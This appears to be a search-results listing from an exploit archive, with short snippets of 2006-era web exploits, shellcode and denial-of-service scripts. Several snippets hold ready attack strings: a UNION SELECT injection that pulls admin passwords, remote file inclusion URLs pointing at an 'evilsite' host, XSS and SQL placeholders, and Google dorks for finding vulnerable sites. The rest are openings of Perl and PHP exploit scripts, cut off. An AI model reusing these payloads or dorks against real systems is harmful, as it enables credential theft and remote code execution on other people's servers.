1622 matches found
Scout Portal Toolkit <= 1.4.0 (forumid) Remote SQL Injection Exploit
Exploit for unknown platform in category web applications ==================================================================== Scout Portal Toolkit = 1.4.0 forumid Remote SQL Injection Exploit ==================================================================== !/usr/bin/perl...
jitakz.txt
Ji-takz Chat mycfg Remote File Inclusion Credit : SpC-x Site : http://wWw.SaVSaK.CoM Greetz : | Liz0ziM | Ejder | FasTBoY | TheBeKiR | Nukedx | Remote File Include : http://www.target.com/path/tag.class.php?mycfg=H /SpC-x...
VBZooM <<--V1.11 "message.php" SQL injection
============================================= Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Breeeeh BoNym-Rootshill-LiNuXrOOt-Sw33t h4ck3r ============================================= Example:- /message. php?UserID=SQL...
Ad Manager Pro 2.6 (ipath) Remote File Include Vulnerability
No description provided by source. Ad Manager Pro 2.6 Remote File Include Vulnerability homepage: phpwebscripts.com Affected files: ad.php and common.php Credit: Basti Vulnerable Code: if $ipath include$ipath.'/common.php'; else include'./common.php'; Example:...
Ad Manager Pro 2.6 - ipath Remote File Inclusion
Ad Manager Pro 2.6 - ipath Remote File Inclusion Ad Manager Pro 2.6 Remote File Include Vulnerability homepage: phpwebscripts.com Affected files: ad.php and common.php Credit: Basti Vulnerable Code: if $ipath include$ipath.'/common.php'; else include'./common.php'; Example:...
Back-end0721.txt
/ Federico Fazzi, / Back-end = 0.7.2.1 jpcache.php Remote command execution / 08/06/2006 1:04 Bug: jpcache.php: line 40 --- $includedir = $PSL'classdir' . "/jpcache"; --- Proof of concept: Back-end have a default path pre-set on jpcache.php, and cracker can execute a remote command...
ESTsoft InternetDisk - Arbitrary File Upload / Script Execution
source: https://www.securityfocus.com/bid/18279/info ESTsoft InternetDisk is prone to an arbitrary file-upload and script-execution vulnerability. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate...
PrideForum 1.0 - forum.asp SQL Injection
PrideForum 1.0 - forum.asp SQL Injection Title : PrideForum 1.0 forum.asp Remote SQL Injection Vulnerability Author : ajann Exploit Example: http://target/path/forum.asp?HID=1%20union+select+0,0,ID,JUser,0,0,0,JPass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt milw0rm.com 2006-05-27...
YLZH(right.php)Cross Site Scripting
========================== Discovery By: Breeeeh Site: www.alshmokh.com E-mail: [email protected] ========================== Example: /right.php?deptid=XSS...
confixx312.txt
// Confixx 3.1.2 XSSdiv style= - Googledork: inurl:confixx inurl:login|anmeldung + Greetz to: Bluegeek + Visit: www.LoK-Crew.de...
RaceEventManagement.txt
============================ Discovery By: Mr-X Site: www.alshmokh.com E-mail: [email protected] =========================== Example: /nennung.php?pid=SQL /nennung.php?pid=XSS...
radlance.txt
Discovered And Coded By Mr.CrackerZ Exploit Code !/usr/bin/perl Discovered and coded by Mr.CrackerZ Security Team Contact me [email protected] Usage: radlance.pl Google: Powered by: RadLance Gold v7 Tested Under RadLance Gold v7 Local Inclusion Exploit Example:...
linux/x86 SET_PORT() portbind 100 bytes
Exploit for linux/x86 platform in category shellcode ======================================= linux/x86 SETPORT portbind 100 bytes ======================================= /--------------------------------------------------------------------------- 100 byte Portbind shellcode by Benjamin Orozco -...
fastclick238.txt
Fast Click ----------- Fix : Contact the Vendor =========================================================== Aria Security Research Http://www.aria-security.net...
Limbo CMS <= 1.0.4.2 (catid) Remote SQL Injection Exploit
No description provided by source. pre i Limbo CMS option=weblinks sql injection exploit i coded by Oo ?php if !isset$GET'host' || !isset$GET'path' || !isset$GET'id' ? Usage: ?echo htmlentities$PHPSELF??host=hostname&path=limbopath&id=userid Exemple: ?echo...
axoverzicht.cgi<==Remote File Inclusion
foud by::::.CrAzY CrAcKeR.::::: Site: http://www.alshmokh.com nono225-mHOn-rageh-port-Lover hacker-Breeeeh -------example: http://target.com/path/axoverzicht.cgi?maand=http://evilsite --------google: inurl:"axoverzicht.cgi?maand";...
PHPSurveyor <= 0.995 (surveyid) Remote Command Execution Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "\r\n"; echo " PHPSurveyor = 0.995 'save.php/surveyid' remote cmmnds xctn \r\n"; echo " by rgod [email protected] site: http://retrogod.altervista.org \r\n"; echo " a special tnX goes to Frozen for his dork! \r\n"; ech...
Autonomous LAN party File iNclusion
Autonomous LAN party File iNclusion -------------------------------------------- Site:http://www.nerdclub.net/alp/ Demo:http://www.redfiles.net/cup/credits.php -------------------------------------------- Example: http://victim.com/path/include/SQuery/gameSpy2.php?libpath=http://evilsite...
PeerCast <= 0.1216 (nextCGIarg) Remote Buffer Overflow Exploit
No description provided by source. / GNU PeerCast = v0.1216 Remote Exploit ====================================== PeerCast is a simple, free way to listen to radio and watch video on the internet. A remotely exploitable buffer overflow has been identified by INFIGO-2006-03-01 which can be...
UnrealIRCd 3.x - Remote Denial of Service
UnrealIRCd 3.x - Remote Denial of Service source: https://www.securityfocus.com/bid/17057/info UnrealIRCd is prone to a remote denial-of-service vulnerability. A remote attacker may exploit this issue to deny service for legitimate users. !/usr/bin/perl Denial of Service exploit for UnrealIRCd...